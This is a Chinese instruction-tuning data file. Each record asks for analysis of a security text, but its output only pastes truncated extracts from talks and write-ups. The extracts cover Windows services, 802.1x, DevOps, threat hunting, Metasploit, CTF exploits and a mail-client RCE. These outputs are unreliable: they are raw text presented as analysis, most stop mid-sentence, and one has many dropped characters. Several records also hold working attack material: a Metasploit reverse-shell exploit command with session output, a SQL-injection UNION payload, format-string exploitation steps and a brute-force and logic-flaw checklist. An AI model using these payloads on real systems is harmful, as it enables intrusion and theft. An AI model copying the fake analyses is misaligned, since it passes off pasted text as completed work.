{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nwindows服务工作原理 windows服务是一种可以在后台完成任务的程序服务程序一般随着系统启动而启动启动权限一般是 systemwindows vista开始为了提升系统的安全性将服务程序放在session 0运行和我们普通的用 户态程序运行在不同的session级别我们无法跨session进行交互因此保证了服务程序的安全我们 随便找一个服务用 process hacker打开他的进程就可以看到如下信息 服务程序不需要用户界面所以服务程序通常是以控制台程序的形式编写的入口函数是main函数一 个服务一般由三部分组成 1. Service control Manager(SCM),SCM存在于Service.exe中,在windows启动的时候会自动运行此 进程以系统特权运行并且提供一个统一的安全的手段去控制服务它其实是一个RPCServer SCM中包含一个存储着已安装的服务和驱动程序的信息的数据库通过SCM可以统一的安全地管 理这些信息一个服务的安装需要将自身写入这个数据库 2. 服务本身一个服务需要拥有从SCM收到信号和命令所必须的特殊代码并且能够在处理后将它的 状态回传给SCM 3. 第三部分是service control dispatcherSCP有用户界面允许用户开始停止暂停继续一个服 务SCP的作用是跟SCM通讯 服务很重要的函数 1. 入口函数中调用SCM通知函数 如果是exe程序那么入口函数一般就指的是main或者winmain函数通常在服务程序的入口函数使用 StartServiceCtrlDispatcher 函数通知SCM可执行程序包含几个服务因为一个exe中可以注册多个 服务程序每个服务的入口回调函数地址是什么 SERVICE_TABLE_ENTRYA结构体的定义如下 当SCM执行服务程序的时候SCM为这个进程中每一个lpServiceStartTable指向的每一个服务产生一个 线程并且入口地址是lpServiceProcSCM启动一个服务程序之后它会等待该程序的主线程去 调 StartServiceCtrlDispatcher如果那个函数在两分钟内没有被调用SCM将会认为这个服务有问题并 调用 TerminateProcess去杀死这个进程这就要求你的主线程要尽可能快的调用 StartServiceCtrlDispatcher StartServiceCtrlDispatcher函数并不是立即返回而是等待所有服务线程退出后才会返回所以不需要 用户自己构造死循环来防止你的程序的主线程退出导致进程结束StartServiceCtrlDispatcher 被调用后 会陷入一个主循环中当在该循环内StartServiceCtrlDispatcher悬挂起自己等待下面两个事件中的 一个发生 第一如果SCM要去送一个控制通知给运行在这个 进程内一个服务的时候这个线程就会激活当控制 通知到达后线程激活并调用相应服务的CtrlHandler函数CtrlHandler函数处理这个 服务控制通知 并返回到StartServiceCtrlDispatcherStartServiceCtrlDispatcher循环回去后再一次悬挂自己 第二如果服务线程中的一个服务中止这个线程也将激活在这种情况下该进程将运行在它里面的 服务数减一如果服务数为 零StartServiceCtrlDispatcher就会返回到入口点函数以便能够执行任何 与进程有关的清除工作并结束进程如果还有服务在运 行哪怕只是一个服务 StartServiceCtrlDispatcher也会继续循环下去继续等待其它的控制通知或者剩下的服务线程中止 因为此函数需要SCM通讯所以该函数所在的进程必须由SCM启动不可以用户通过双击启动双击启 动会造成SCM通讯失败从而导致函数调用失败 2. 服务线程入口函数 此函数就是StartServiceCtrlDispatcherA传递给SCM促使其为每个服务启动的函数一般命名为 ServiceMain ,需要如下形式: 此函数由操作系统调用并执行能完成服务的代码服务线程入口函数必须在80秒内完成初始化工作 有两个必不可少的工作第一项工作是调用 RegisterServiceCtrlHandler 通知SCM此服务的 CtrlHandle的回调函数地址: BOOL StartServiceCtrlDispatcher( const SERVICE_TABLE_ENTRYA *lpServiceStartTable ); typedef struct _SERVICE_TABLE_ENTRYA { LPSTR lpServiceName; //服务名称 LPSERVICE_MAIN_FUNCTIONA lpService", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOwning the LAN in 2018 Defeating MACsec and 802.1x-2010 DEF CON 26 Gabriel solstice Ryan Disclaimers & Updates These slides are an early version designed for pre-release prior to DEF CON 26. All content will be updated by the time of the presentation at DEF CON 26 in August. Final versions of all content will be available at:  https://www.digitalsilence.com/blog/ About: Digital Silence Denver-based security consulting firm:  Penetration testers who give a !@#$  Red teaming  Penetration Testing  Reverse-engineering / advanced appsec / research Twitter (for those of you who are into that sort of thing): @digitalsilence_ About: Gabriel Ryan (a.k.a. solstice) Co-Founder / Senior Security Assessment Manager @ Digital Silence  Former Gotham Digital Silence, former OGSystems  Red teamer / Researcher / New Dad Twitter: @s0lst1c3 LinkedIn: ms08067 Email: gabriel@digitalsilence.com Introduction to 802.1x The 802.1x authentication protocol:  Authentication protocol  Used to protect a local area network (LAN) or wireless local area network (WLAN) with rudimentary authentication What is 802.1x?  Authentication protocol  Used to protect a local area network (LAN) or wireless local area network (WLAN) with rudimentary authentication 802.1.x defines an exchange between three parties:  supplicant  the client device that wishes to connect to the LAN [1][2][9]  authenticator  a network device such as a switch that provides access to the LAN [1][2][9]  authentication server  a host that runs software that implements RADIUS or some other Authorization, Authentication, and Accounting (AAA) protocol [1][2][9]  authenticator can be thought of as a gatekeeper  supplicant connects to a switch port and provides the authenticator with its credentials [1][2][9]  authenticator forwards credentials to the authentication server [1][2][9]  Authentication server validates the credentials, and either allows or denies access the network [1][2][9] 802.1x is (typically) a four step sequence: 1. Initiali", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n研发运营一体化DevOps 标准体系及能力成熟度模型解读 萧田国 DevOps时代社区发起人 高效运维社区发起人 个人介绍 萧田国 高效运维社区 发起人 DevOps 时代社区 发起人 DevOps 标准体系 联合发起人 DevOpsDays 中国 联合发起人 开放运维联盟主席 复旦大学特聘讲师 分享内容 1DevOps 及缘起 2DevOps 能力成熟度模型 解读 3DevOps 能力成熟度模型 核心贡献者 4DevOps 能力成熟度模型 本次重磅发布 5DevOps 能力成熟度模型 评估参与办法 DevOps 及缘起  2008年Patrick Debois 等初次提出 DevOps  2009年Patrick Debois 发起 DevOps 运动  DevOps 是什么  开发和运维的缩写  DevOps 是一组最佳实践 Ø 强调业务人员及IT专业人员开发测试运维等在应 用和服务生命周期中的协作和沟通 Ø 强调整个组织的合作以及交付和基础设施变更的自动化 从而实现持续集成持续部署和持续交付  DevOps敏态IT的实现之道 DevOps技术的集大成者 企业级 DevOps服务于业务目标 DevOps 更需要面向业务目标助力业务成功 //不是技术噱头和技术人员的玩具  以是否提高了企业的市场占有率营收和利润为衡量标准 //不耍流氓  顺畅高质量的交付有用的价值 //有效应对 VUCA 挑战快速灵活响应变化 DevOps 道法术器 道 快速交付价值灵活响应变化 法 全局打通敏捷开发 & 高效运维 术 系统应用指导原则最佳实践 器 端到端工具链相互联通和整合 大道总括性的原则 战术具体的手段 法则相关标准 工具落地的实践 主管单位工信部 中国信息通信研究院国家级智库可信云等出品单位 OSCAR联盟 目前起草高效运维社区腾讯京东浙江移动中国电信中国银行华泰证券中国太保等 目前进展已于2017年12月正式立项 法DevOps 标准研发运营一体化能力成熟度模型 级别 英文 中文 1级 Regressive 阻碍的 2级 Repeatable 可重复的 3级 Consistent 一致的 4级 Quantitative 量化的 5级 Optimizing 优化的 研发运营一体化DevOps能力成熟度模型系列标准 系列 标准 研发运营一体化DevOps能力成熟度模型 第1部分 总体架构 研发运营一体化DevOps能力成熟度模型 第2部分 敏捷开发 研发运营一体化DevOps能力成熟度模型 第3部分 持续交付 研发运营一体化DevOps能力成熟度模型 第4部分 技术运营 研发运营一体化DevOps能力成熟度模型 第5部分 应用设计 研发运营一体化DevOps能力成熟度模型 第6部分 风险管理 研发运营一体化DevOps能力成熟度模型 第7部分 组织结构 敏捷开发管理 持续交付 技术运营 应用设计 组织结构 部分标准编写成员所在单位 DevOps 标准试评估浙江移动 DevOps标准体系 本次重磅发布  标准1整体架构更新  标准2敏捷开发管理更新  标准3持续交付更新  标准7组织结构新增 相关需求请联系@牛女士 邮箱niuxiaoling@caict.ac.cn 电话010-62300559 相关需求请@杨女士 邮箱yangwenhui@greatops.net 电话13021086339 认证评估 培训 THANKS", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBuilding a Threat Intelligence Program Michael Smith, CISSP-ISSEP APJ Security CTO mismith@akamai.com @rybolov 2015 AKAMAI | FASTER FORWARDTM Straw Poll: What Is Threat Intelligence? Data feeds for purchase Big Data, Big Data, Big Data OSINT Output from a SIEM Tools dumps Executive reports Reporting from your vendors Blogs and RSS Things that if you ignore youre now negligent Too much noise, not enough signal The greatest thing since Hainanese Chicken Rice 2015 AKAMAI | FASTER FORWARDTM Akamai CSIRT Customer Security Incident Response Team (CSIRT): Incident Response for Akamai customers HTTP(s), DNS, and the infrastructure Threat briefs Out of scope: APT, endpoints, email, authentication We collect and provide information: OSINT Coordination with peer CERT/SIRT/SOC Threat intelligence Discussions with policy-makers Customer outreach (internal and direct) 2015 AKAMAI | FASTER FORWARDTM Qualities of Good Intelligence Intelligence Accurate Timely Relevant 2015 AKAMAI | FASTER FORWARDTM How the Intelligence World Does It Intelligence Requirements (questions to answer) Indicators (which data points can prove/disprove the question) Coverage (how to find out the data points) 2015 AKAMAI | FASTER FORWARDTM Akamai CSIRTs Intelligence Requirements Which customers need our help as incident responders?  Which active or future campaigns target our customers?  Have any customers been impacted by an attack?  Are their any attacks that could spread to other targets? Are there any additional things that we can do to protect our customers?  Are there any new tools that evade our controls set?  Are there any attack indicators that we should be looking for temporarily during an event?  Have we seen any new types of attacks?  Are there activities associated with particular attacks that we should also look for? 2015 AKAMAI | FASTER FORWARDTM My Sources Incident response activities: alerts and investigations OSINT  Scumblr  Site scraping  Is it a customer? tool Email lists ISACs  Financia", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMetasploit 基础知识 整理此文档纯粹出于兴趣爱好如果有涉及版权的问题请联系原文档的作者. 由于本人能力有限文档中难免会有些错误欢迎大家来信指正. [原文]http://www.offensive-security.com/metasploit-unleashed/ Metasploit 基础知识 Metasploit 框架提供了多种不同的接口每个接口都有自己的优势与不足尽管如此目前仍 没有一个很好的接口用于使用 MSF尽管 msfconsole 能够访问 Metasploit 的众多特性当 然了解熟悉 MSF 提供的所有接口多工作还是很有效的 Msfcli Msfcli 为 framework 提供了一个强劲的命令行接口. root@kali:~# msfcli -h Usage: /opt/metasploit/msf3/msfcli <exploit_name> <option=value> [mode] ======================================================================= Mode Description ---- ----------- (A)dvanced 查看模块可用的一些高级参数 (AC)tions 显示附加模块的可用操作 (C)heck 对所选模块进行常规检查 (E)xecute 执行所选模块 (H)elp 显示 Msfcli 帮助信息 (I)DS Evasion 显示模块可用的 IDS 逃逸机制 (O)ptions 显示模块参数选项 (P)ayloads 显示模块可用的攻击载荷 (S)ummary 显示模块的整体信息 (T)argets 显示溢出模块可选的目标类型 msfcli 使用 = 为参数选项赋值所有选项对大小写敏感 root@kali:~# msfcli exploit/multi/samba/usermap_script RHOST=172.16.194.172 PAYLOAD=cmd/unix/reverse LHOST=172.16.194.163 E [*] Please wait while we load the module tree... ## ### ## ## ## ## #### ###### #### ##### ##### ## #### ###### ####### ## ## ## ## ## ## ## ## ## ## ### ## ####### ###### ## ##### #### ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ##### ## ## ## ## ## ## ## #### ### ##### ##### ## #### #### #### ### ## =[ metasploit v4.5.0-dev [core:4.5 api:1.0] + -- --=[ 936 exploits - 500 auxiliary - 151 post + -- --=[ 252 payloads - 28 encoders - 8 nops =[ svn r15767 updated today (2012.08.22) RHOST => 172.16.194.172 PAYLOAD => cmd/unix/reverse [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo cSKqD83oiquo0xMr; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: \"cSKqD83oiquo0xMr\\r\\n\" [*] Matching... [*] A is input... [*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:57682) at 2012-06-14 09:58:19 -0400 uname -a Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux 如果你不清楚某个模块有哪些参数可以在所选模块字符串后面加上大写", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Binary Gauntlet 2 Category: Binary Exploitation, 50 points ## Description > How does ASLR affect your exploit? A binary file was attached. ## Solution This is the follow-up for [Binary Gauntlet 1](Binary_Gauntlet_1.md). Let's run `checksec` on the file: ```console (user@kali)-[/media/sf_CTFs/pico/Binary_Gauntlet_2] $ checksec --file=gauntlet [*] '/media/sf_CTFs/pico/Binary_Gauntlet_2/gauntlet' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments ``` We can see that there are virtually no protections for this program. The description says that they've enabled ASLR though, which means that some addresses should get randomized. Using Ghidra, we can check the decompiled output of the program: ```c undefined8 main(void) { char local_78 [104]; char *local_10; local_10 = (char *)malloc(1000); fgets(local_10,1000,stdin); local_10[999] = '\\0'; printf(local_10); fflush(stdout); fgets(local_10,1000,stdin); local_10[999] = '\\0'; strcpy(local_78,local_10); return 0; } ``` The local buffer address leak from the previous challenge is gone. If we're able to find it using another method, we'll be able to replicate our exploit from the previous challenge by copying some shellcode to the local buffer and jumping to it. To leak the buffer address, we'll use a vulnerability which has existed since the first challenge but wasn't needed until now: A format string vulnerability. A format string vulnerability is when the program allows the user to control the first parameter to `printf`. This means that the user can provide format string specifiers such as `%x`, `%s` or `%p` and leak data from the stack. We'll want to use this vulnerability to leak the address of the local buffer, so that we can jump to it and execute our shellcode from it. Let's run the program in the debugger and check the address of the local buffer. But first, we'll check the disassembly and see where the buffer starts: ```assembly 0x00000000004", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nbuilding the @shortxstack @sethlaw intros  whitney champion  senior systems engineer  https://unicorns.lol  @shortxstack  seth law  appsec consultant  https://redpointsecurity.com  @sethlaw inception what had happened was... android v1.0 iOS v1.0 its official pain points scheduling dont trust hax0rs bug fixes at all hours finding time waiting on [REDACTED] overhaul kotlin overhaul ui redesign multiple conferences high points easter eggs attendee feedback community involvement lessons learned haters gonna hate github issues waiting on [REDACTED] backup plans going forward more streamlined iOS/android parity scheduling app more conferences feedback is always welcome :) questions? thank you <3 @shortxstack @sethlaw", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n某Air客户端0click RCE分析 前 某Air客户端的RCE漏洞曝出来有段时间了前已经分析了如何利%00截断实现双击 附件即可执exe的效果[详情附件1] 本就再进步借助个XSS实现打开邮件即可触 发RCE XSS挖掘 翻了下件发现客户端显示邮件的是HTML写的客户端调cef渲染HTML HTML件在 cmclient\\app\\template\\readMail 录中其中 index.html 是内容 readMail.html 是邮件正的模板打开邮件时客户端会依照这个模板成个包含邮件正 的完整html放在 C:\\Users\\Administrator\\AppData\\Roaming\\Cm\\CMClient\\temp\\mail 录通过 iframe包含在中简单看下代码很容易就能发现两个疑似的XSS漏洞点 第个点在index.html中 如果这 mailId 可控的话也许可以使单引号构造个XSS但是没找到控制mailId的办 法且这还是需要点击才能触发满不了预期 第个点在邮件正中Air客户端在处理邮件正的时候虽然去掉了 <script> 标签以 及 onxxx 的事件但是通过个换很容易就能绕过 不过这由于正模板中加了很严格的CSP策略inline的js代码法执所以这条路也被迫 终p.s. 版没有CSP限制不过同样也没有这个绕过 本以为这次分析到这就要以失败告终了多亏了佬提醒才发现原来邮件正的 charset 中也有个XSS charset 来于模板替换且位于CSP之前所以不受CSP的影 响之前想着如果通过不完善的策略绕过CSP确没想到就在眼底下还有另外个不受 CSP影响的漏洞点哎果然是不识庐真只缘身在此中 charset变量xss漏洞成因 概分析了下由模板件成标html的的过程: parse_html 函数主要将模板中的变量都替换为eml中的值然后调WriteFile写临时 件这主要跟下 parse_html 函数此函数有个循环会对模板中的多处变量都进 替换 主要看replace_key函数 调试下看下到底传的是什么参数 第个参数 3E 是html模板开头到 {{CHARSET}} 的度第三个参数 0B 是 {{CHARSET}} 的度第四个参数就是我们 eml中设定的变量值继续跟会发现 直接次内存copy将字符串拼接起来 接着第次copy 此发现并没有对 charset的值进任何的过滤直接拼接到了模板所以可以逃逸双引号 产XSS漏洞 新版本patch分析 最后看下最新版是怎么patch的找到同样的函数发现在读取eml件的时候加了这样的 个过滤函数 如果读取的 charset变量有字符不再这个字符串表中就直接将 charset变量重置为空这修 复法太暴了.... 感觉是没办法再搞了 但是要注意他这个仅仅是对 charset 变量做了次如果其他地也有可以控制的变量同 样还是存在xss的可能 构造利 有了XSS其实就较容易利了只需要执js触发打开附件的操作就可以实现0click rce 由于众所周知的原因PoC暂时不公开感兴趣的伙伴可以尝试构造波 知识星球 欢迎家加我的知识星球和群伙伴起交流学习", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 条件判断 --- - https://www.kancloud.cn/imxieke/ruby-base/107292 --- # 什么是条件判断 接下来我们来考虑一下如何将公历转换为平成纪年首先我们将输入的字符串转换为数值后减去 1988最后输出运算结果结束程序 > 1989 年为平成元年2014 年是平成 26 年 ```ruby # 将公历转换为平成纪年 ad = ARGV[0].to_i heisei = ad - 1988 puts heisei ``` ```ruby > ruby ad2heisei.rb 2013 25 ``` 但是这个程序有点小问题如果我们输入 1989 年以前的年份返回值会变成 0 或者负数 按道理1989 年以前的年份是不能转换为平成 XX 年的因此程序本不应允许输入示例中那样的年份我们将程序稍微改进一下若输入 1989 年以前的年份程序则返回无法转换的提示 在这样的情况下为了实现程序在某个条件时执行处理否则执行  处理Ruby 为我们准备了条件判断语句 条件判断语句主要有以下三种 - if 语句 - unless 语句 - case 语句 # Ruby 中的条件 **条件与真假值** 我们在之前的章节已经介绍过了在条件判断中常用到的比较运算符等号 `==`不等号 `>``<` 等都是比较运算符 比较的结果分为 `true` 和 `false` 两种顾名思义比较结果正确时为 `true` 错误时为 `false`  除了比较运算符外Ruby 中还有很多可以作为条件判断的方法例如字符串的 `empty?` 方法该字符串的长度为 0 时返回 `true`否则返回 `false` ```ruby p \"\".empty? #=> true p \"AAA\".empty? #=> false ``` 另外除了 `true` 和 `false` 外还有其他值可作为条件判断的值例如用正则表达式进行匹配时匹配成功返回该字符串的位置匹配失败返回 `nil` ```ruby p /Ruby/ =~ \"Ruby\" #=> 0 p /Ruby/ =~ \"Diamond\" #=> nil ``` - 真 : false  nil 以外的所有对象 - 假 : false  nil 也就是说Ruby 会认为 `false` 与 `nil` 代表假除此以外的所有值都代表真因此Ruby 中的真 / 假并非绝对等同于 `true/false``true` 代表真`false` 代表假同时不返回 `true` 或 `false` 的方法只要能返回 `nil`也可作为条件判断的表达式来使用另外在 Ruby 中还有个约定俗成的规则为了使程序更容易理解返回真假值的方法都要以 `?` 结尾建议大家在写程序时也遵守这个规则 # 逻辑运算符 在判断多个条件表达式时我们会用到逻辑运算符 `&&` 和 `||` 条件 1 && 条件 2 表示条件 1 为真并且条件 2 也为真时则整体的表达式返回真两者中只要一个返回假时则整体的表达式返回假 相对地 条件 1 || 条件 2 表示条件 1 为真或者条件 2 为真时整体的表达式返回真两者同时为假时则整体的表达式返回假 还有表示否定的逻辑运算符 !条件 表示相反的条件也就是条件为假时表达式返回真条件为真时表达式返回假例如我们想判断整数 x 是否在 1 到 10 之间if 语句可以这么写 ```ruby if x >= 1 && x <= 10  end ``` 与上面的条件相反表示1 到 10 以外时使用!表达式可以写成 `!(x >= 1 && x <= 10)`不过像下面写成小于 1或者大于 10可能更加直接更便于理解 ```ruby if x < 1 || x > 10  end ``` 条件判断对于控制程序的行为非常重要过于复杂难以理解的条件会使程序的目的也会变得难以琢磨建议大家在写程序时注意尽量写便于理解的条件 在 Ruby 中还有与 `&&``||``!` 意思相同但优先级略低的逻辑运算符 andornot # if 语句 接下来我们就来看看条件判断语句到底如何使用if 语句是最基本的条件判断语句用法如下 ```ruby if 条件 then 处理 end ``` > 可以省略 then 在这基础上可再加上 `elsif``else`  ```ruby if 条件 1 then 处理 1 elsif 条件 2 then 处理 2 elsif 条件 3 then 处理 3 else 处理 4 end ``` > 可以省略 then Ruby 会按照从上到下的顺序进行判断首先条件 1 为真时程序执行处理 1条件 1 为假时程序再判断条件 2若为真时执行处理 2同样地条件 2 为假时程序再判", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhttp:// toool us Lockpick Village Pins Wafers Combo Resist ant Bumpi ng Impres sion Master ing Picks Why do Locks Matter ? http:// toool us Locks Hold a Special Place in Our Lives http:// toool us Locks Hold a Special Place in Our Lives http:// toool us Locks Hold a Special Place in Our Lives http:// toool us Locks Hold a Special Place in Our Lives http:// toool us What Does a Lock Signify? (Schuyler Towne at RVAsec 2012) http:// toool us What Does a Lock Signify? (Schuyler Towne at RVAsec 2012) http:// toool us What Does a Lock Signify? (Schuyler Towne at RVAsec 2012) http:// toool us What Does a Lock Signify? (Schuyler Towne at RVAsec 2012) http:// toool us What Does a Lock Signify? (Schuyler Towne at RVAsec 2012) http:// toool us Puzzles http:// toool us Puzzles http:// toool us Puzzles http:// toool us Lockpicking is fun puzzle solving for us http:// toool us Try your hand at Lockpicking Games http:// toool us  Win Fabulous Prizes and Become Famous! http:// toool us The Competition Can Get Serious Intro to Lockpicking http:// toool us First, a word about rules Yes, we have rules. J 1. Do not pick locks which you do not own. 2. Do not pick locks upon which you rely. http:// toool us The Three Kinds of Lock-Opening http:// toool us The Three Kinds of Lock-Opening 1. Lockpicking  what we do TOOOL provides the knowledge and the means  what spies do TOOOL provides neither knowledge nor means http:// toool us The Three Kinds of Lock-Opening 1. Lockpicking  what we do TOOOL provides the knowledge and the means 2. Quick & Dirty what spies do TOOOL provides neither knowledge nor means http:// toool us The Three Kinds of Lock-Opening 1. Lockpicking  what we do TOOOL provides the knowledge and the means 2. Quick & Dirty  what criminals do TOOOL provides knowledge. . . but no means 3. Covert & High-Tech  what spies do TOOOL provides neither knowledge nor means http:// toool us The Three Kinds of Lock-Opening 1. Lockpicking  what we do TOOOL provides the knowledge and the me", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Poor Guy (web, 150p) URL : http://ctf.sharif.edu:8086/index.php ![](./screenshot.png) SQL Injection with single quote replacing ' (single-quote) into \\' , so by sending \\' it gets replaced into \\\\' , which will treat backslash as non-special sign and quote as special. After making some enumeration we have found out some more details about DB : ``` database : book_shop table : books some of the columns : book_id book_name book_serial book_isbn book_cover is_premium ``` Therefore , performing POST request : ``` POST /index.php HTTP/1.1 Host: ctf.sharif.edu:8086 [...] book_selection=\\' or true UNION SELECT 1,2,3,4,5,6,book_serial,8 FROM book_shop.books LIMIT 1 OFFSET 5; # ``` we obtain flag SharifCTF{931b20ec7700a61e5d280888662757af} in the response : ``` [...] <img src=\"SharifCTF{931b20ec7700a61e5d280888662757af}\" class=\"img-rounded img-responsive\" style=\"width:100%\" alt=\"Rounded Image\"> [...] ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA\"GTVHACKER\"LLC\"PRODUCTION\" GTVHACKER\"PRESENTS: GTVHacker\"  Formed'to'root'the'original' Google'TV'in'2010'  Released'exploits'for'every' Google'TV'device'  Plus'some'others:' Chromecast,'Roku,'Nest'  Many'more'to'come!'' Speaking\"Members\" Amir\"Etemadieh\"(Zenofex)\"'Research'ScienHst'at'Accuvant'LABS,' founded'GTVHacker'\" CJ\"Heres\"(cj_000)\"'Security'Researcher'/'Group'Head,' Technology'Development'[somewhere]'' Hans\"Nielsen\"(AgentHH)\"'Senior'Security'Consultant'at' Matasano'' Mike\"Baker\"([mbm])\"'Firmware'developer,'OpenWRT'coT founder' Members\" gynophage\"\"He's'(again)'running'a'liXle'thing'called'the' DEFCON'CTF'right'now'' Jay\"Freeman\"(saurik)\"\"Creator'of'Cydia'' Khoa\"Hoang\"(maximus64)\"\"\" ! Tom\"Dwenger\"(tdweng)\"'Excellent'with'APK'reversing'and' anything'Java'' Why\"Hack\"ALL\"The\"Things?\"  We'own'the'hardware,'why' not'the'so\\ware?''  Give'new'life'to'abandoned' hardware''  Make' the' products' more' awesome''  We'enjoy'the'challenge'' Takeaways\"  You'get'a'root!'  You'get'a'root!'  You'get'a'root!'  Everybody'gets'a' root!' Learning'is'awesome,'but'this'presentaHon'is'about'the'bugs' Avenues\"Of\"A\\ack\" A\\acks\"Redacted\" No'early'freebies!'' We're'releasing'at'DEFCON'22!' Saturday,'August'9th'at'10am'T'Track'1' Updated'slides'and'files'will'be'published'here:' hXp://DC22.GTVHACKER.COM' Demo\" 4'minutes,'20'devices,'1'special'guest' Welcome'DUAL'CORE!' All'The'Things'' Dual'Core'CD's'are'available'in'the'DEFCON'vendor'area' Quesons\" Well'be'doing'a'Q&A'a\\er'the'talk'at:' TBD' Thank\"You\" Slide resources can be found at: http://DC22.GTVHacker.com/ WIKI: http://www.GTVHacker.com FORUM: http://forum.GTVHacker.com BLOG: http://blog.GTVHacker.com IRC: irc.freenode.net #GTVHacker Follow us on Twitter: @GTVHacker Also,'a'big'thank'you'to:' DEFCON'and'Dual'Core'", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n原文 by do9gy ## 1.订单金额修改 提交订单时tamper 抓包修改金额值对传入参数没有验证订单提交成功并可以付款 修改币种 修改优惠券积分 修改运费 修改商品id ... ## 2.重放交易 1直接重放如果允许重放那些秒杀抢购活动就会被多次请求下单成功 2更换用户重放CSRF 3拒绝服务多次重放导致服务器响应不过来某次重放交易金额为初始化的0  ## 3.暴力破解 1用户密码可被暴力破解 2短信验证码可被暴力破解 3身份证后四位可被暴力破解 4cvv2码可被暴力破解CVV/CVC在联机交易刷卡的时候核对CVV2/CVC2在非现场交易/手工交易刷不到卡时核对 5撞库攻击  比如一个站点可以使用手机和短信验证码登录输入手机号点击获取验证码后随便输入一个验证码点击确认用 burpsuite 抓包 使用 intruderforce可以对6位的验证码进行爆破在服务器ban 掉之前有一定概率的成功机会有效时间内的尝试次数/1000000 ## 4.商品数量为负数或者小数 1负数导致增加余额 2负数抵消订单金额 3整形溢出 4小数四舍五入  ## 5.订单遍历 1订单序号顺序遍历 2加密方法被猜解  ## 6.越权平行权限 1越权修改其他用户密码 2修改其他用户资料 3越权读取其他用户站内信 4越权读取其他用户支付订单 ## 7.短信验证码 1服务端回显短信验证码明文 2短信验证码接口ddos 3绑定手机号可允许篡改 4任意手机号绑定  ## 8.多余的回显 1输入A信息回显B信息 2加密信息不统一 1334455xxxx与133xxxx6677 3用户名不存在与用户名或密码错误", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow to overthrow a Government Chris Rock chris@kustodian.com Cyber Mercenaries #2 ? US National Intelligence Director James Clapper says in 2016 Cyber Espionage came second to ISIS as the biggest world threats. 1. ISIS 2. Cyber Espionage 3. North Korea Hackers previously held the crown in 2013, 2014 and 2015. Occupier Occupied Country New Terrorist Org England Ireland IRA Soviet Union Afghanistan Taliban Israel Lebanon Hezbollah America Saudi Arabia Al Qaeda  Bin Laden America Iraq ISIS Occupier + Occupied Country = Terrorist So why did we come 2nd Mercenary COUP Structure The Boss Special Interest Groups Why use Mercenaries Clandestine Covert Arms length, harder to be tied directly to another Country or Company Loyalty As long as you pay they are there to stay $$$$ Not a War No coffins with American flags on TV eroding public support. Its not a war, its a conflict. Say 1 thing Do another Official Public Policy = X Use Mercenaries for strategic Policy = Y Dogs of War Benefits vs Military Cyber War is for Fictional Writers. Cyber Conflicts run by mercenaries provides political arms length Mercenary Coup, Anti Coup Companies & Proxies Regime Change Options Revolution REVOLUTION - A large group fighting or protesting for social, political or economic change United States 1775 Egypt 2011 Ukraine 2014 Coup COUP d'état - The sudden overthrow of an existing government by a small group. Putsch Invade Coup Revolution Low Intensity Operations Regime Change Order of Ops Iraq: Failed Coup 1996 Saddam Panama: 5 Failed Coups against General Noriega 1989 Coup Prevention - Private Army Colonel Gadhafi Libya Mercenaries & Revolutionary Guards 3000+ Saudi Royal Family and National Guard (White Army) 25,000+ Coup Prevention - Faux President: Teodoro Obiang Nguema Mbasogo Coup Prevention Spy Vs Spy Intelligence ODNI  Office of the Director of National Intel NGA  National Geospatial Intelligence Agency CIA  Central Intelligence Agency NRO  National Reconnaissance Office NSA  National Se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPUBLIC THREAT HUNTING, THE NEW WAY HITCON PACIFIC 2017 In Ming, Wei Chea PUBLIC INTRO 1 In Ming (胤銘) Loves MMA Wei Chea (偉傑) Loves diving & my dog ½ Taiwanese PUBLIC We are not involved in ALL the information we are sharing today. Many of the information (use cases, tools) we going to discuss are made possible by a group of very dedicated people in Countercept and the security community. 2 DISCLAIMER PUBLIC  What is threat hunting?  People, Process, Technology  Case Study  How to start threat hunting  Q & A 3 AGENDA PUBLIC WHAT IS THREAT HUNTING? PUBLIC 5 THREAT HUNTING  IP, Domain or Hash Search  Hunting on the darknet or Internet  Endpoint Detection & Response (EDR) = Threat Hunting!?  Automated Threat Hunting!? PUBLIC First discussed in mid 2000s by NSA/US Airforce. Definition of hunting in The US Army LandCyber White Paper released in 2013 THREAT HUNTING 6 cyber hunt teams will work inside the Army enterprise to actively search for and locate threats that have penetrated the Army enterprise, but not yet manifested their intended effects. Counter-reconnaissance, or hunt forces, will work within Army networks to maneuver, secure, and defend key cyberspace terrain, identifying and defeating concealed cyber adversaries that have bypassed the primary avenues of approach monitored by automated systems. 